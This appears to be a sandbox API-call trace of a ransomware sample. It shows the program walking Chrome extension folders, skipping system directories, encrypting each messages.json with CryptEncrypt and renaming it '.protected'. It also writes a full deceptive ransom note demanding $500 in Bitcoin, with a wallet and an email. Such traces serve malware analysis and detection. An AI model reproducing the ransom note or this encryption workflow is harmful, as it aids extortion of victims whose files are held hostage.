141 [0081.376] lstrcmpW (lpString1="de", lpString2=".") returned 1 [0081.376] lstrcmpW (lpString1="de", lpString2="..") returned 1 [0081.376] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\*") returned 143 [0081.376] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.377] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.377] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.377] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.377] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.377] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.377] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\.") returned 143 [0081.377] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.377] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.377] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.377] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.377] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.377] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.377] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.377] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\..") returned 144 [0081.377] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.377] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.377] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.377] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 
[0081.378] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.378] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.378] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.378] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.378] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json") returned 155 [0081.378] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.378] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.378] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.378] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.378] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.378] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json") returned 155 [0081.378] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.378] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json") returned 155 [0081.378] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.378] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json") returned 155 [0081.378] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.378] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xef, lpOverlapped=0x0) returned 1 [0081.379] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff11, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.379] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xef, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xef, lpOverlapped=0x0) returned 1 [0081.380] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.380] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.380] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.380] CloseHandle (hObject=0x168) returned 1 [0081.380] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json.protected") returned 165 [0081.380] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json.protected")) returned 1 [0081.381] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.381] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.381] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\RESTORE_FILES.txt") returned 159 [0081.381] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0x164 [0081.381] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.381] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.382] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0081.382] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.382] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.382] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.382] CloseHandle (hObject=0x164) returned 1 [0081.382] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.382] lstrcmpiW (lpString1="el", lpString2="Windows") returned -1 [0081.382] lstrcmpiW (lpString1="el", lpString2="Program Files") returned -1 [0081.382] lstrcmpiW (lpString1="el", lpString2="Program Files (x86)") returned -1 [0081.382] lstrcmpiW (lpString1="el", lpString2="$Recycle.bin") returned 1 [0081.382] lstrcmpiW (lpString1="el", lpString2="System Volume Information") returned -1 [0081.383] wnsprintfW 
(in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el") returned 141 [0081.383] lstrcmpW (lpString1="el", lpString2=".") returned 1 [0081.383] lstrcmpW (lpString1="el", lpString2="..") returned 1 [0081.383] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\*") returned 143 [0081.383] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.383] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.383] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.384] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.384] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.384] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.384] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\.") returned 143 [0081.384] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.384] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.384] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.384] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.384] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.384] 
lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.384] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.384] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\..") returned 144 [0081.384] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.384] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.384] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.384] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.384] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.384] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.384] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.384] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.384] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json") returned 155 [0081.384] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.384] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.384] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.384] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.384] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.385] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json") returned 155 [0081.385] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.385] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json") returned 155 [0081.385] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.385] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json") returned 155 [0081.385] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.386] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x14c, lpOverlapped=0x0) returned 1 [0081.387] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffeb4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.387] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x14c, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x14c, lpOverlapped=0x0) returned 1 [0081.387] SetFilePointerEx (in: hFile=0x168, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.387] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.387] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.387] CloseHandle (hObject=0x168) returned 1 [0081.387] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json.protected") returned 165 [0081.387] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json.protected")) returned 1 [0081.388] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.388] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.388] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\RESTORE_FILES.txt") returned 159 [0081.388] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.389] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.389] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.390] lstrlenA (lpString="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") returned 684 [0081.390] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.390] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.390] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0081.390] CloseHandle (hObject=0x164) returned 1 [0081.390] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.390] lstrcmpiW (lpString1="en", lpString2="Windows") returned -1 [0081.390] lstrcmpiW (lpString1="en", lpString2="Program Files") returned -1 [0081.390] lstrcmpiW (lpString1="en", lpString2="Program Files (x86)") returned -1 [0081.391] lstrcmpiW (lpString1="en", lpString2="$Recycle.bin") returned 1 [0081.391] lstrcmpiW (lpString1="en", lpString2="System Volume Information") returned -1 [0081.391] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en") returned 141 [0081.391] lstrcmpW (lpString1="en", lpString2=".") returned 1 [0081.391] lstrcmpW (lpString1="en", lpString2="..") returned 1 [0081.391] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\*") returned 143 [0081.391] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.391] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.391] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.391] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.391] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.391] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.391] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" 
